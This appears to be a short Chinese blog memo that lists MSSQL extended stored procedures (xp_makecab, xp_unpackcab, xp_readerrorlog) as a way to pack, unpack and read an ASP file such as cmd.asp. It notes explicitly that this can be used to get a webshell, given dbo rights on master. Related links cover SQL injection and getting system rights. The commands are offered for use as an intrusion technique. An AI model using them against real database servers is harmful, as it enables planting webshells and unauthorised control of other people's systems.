EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
打包
EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
解包,可以用于得到webshell
EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp'
读文本代码
要求权限:
master的dbo权限
0-----------------------------------------------------------------------0
马骏 :
希望看到的人能用上
如果遇到什么问题可以留言给我
只显示10条记录相关文章
mssql数据操作小备忘 (浏览: 5, 评论: 0)
MSSQL2005 数据库备份语句 (浏览: 8238, 评论: 0)
MSSQL显错模式的手工注入实现原理思考和实战 (浏览: 12525, 评论: 0)
MSSQL显错模式的手工注入实现原理思考和实战 (浏览: 8257, 评论: 0)
论在mssql中public和db_owner权限下拿到webshell或者系统权限 (浏览: 11102, 评论: 0)
MSSQL2005 数据库备份语句 (浏览: 8238, 评论: 0)
MSSQL显错模式的手工注入实现原理思考和实战 (浏览: 12525, 评论: 0)
MSSQL显错模式的手工注入实现原理思考和实战 (浏览: 8257, 评论: 0)
论在mssql中public和db_owner权限下拿到webshell或者系统权限 (浏览: 11102, 评论: 0)
Trackbacks
 |
 |
 |
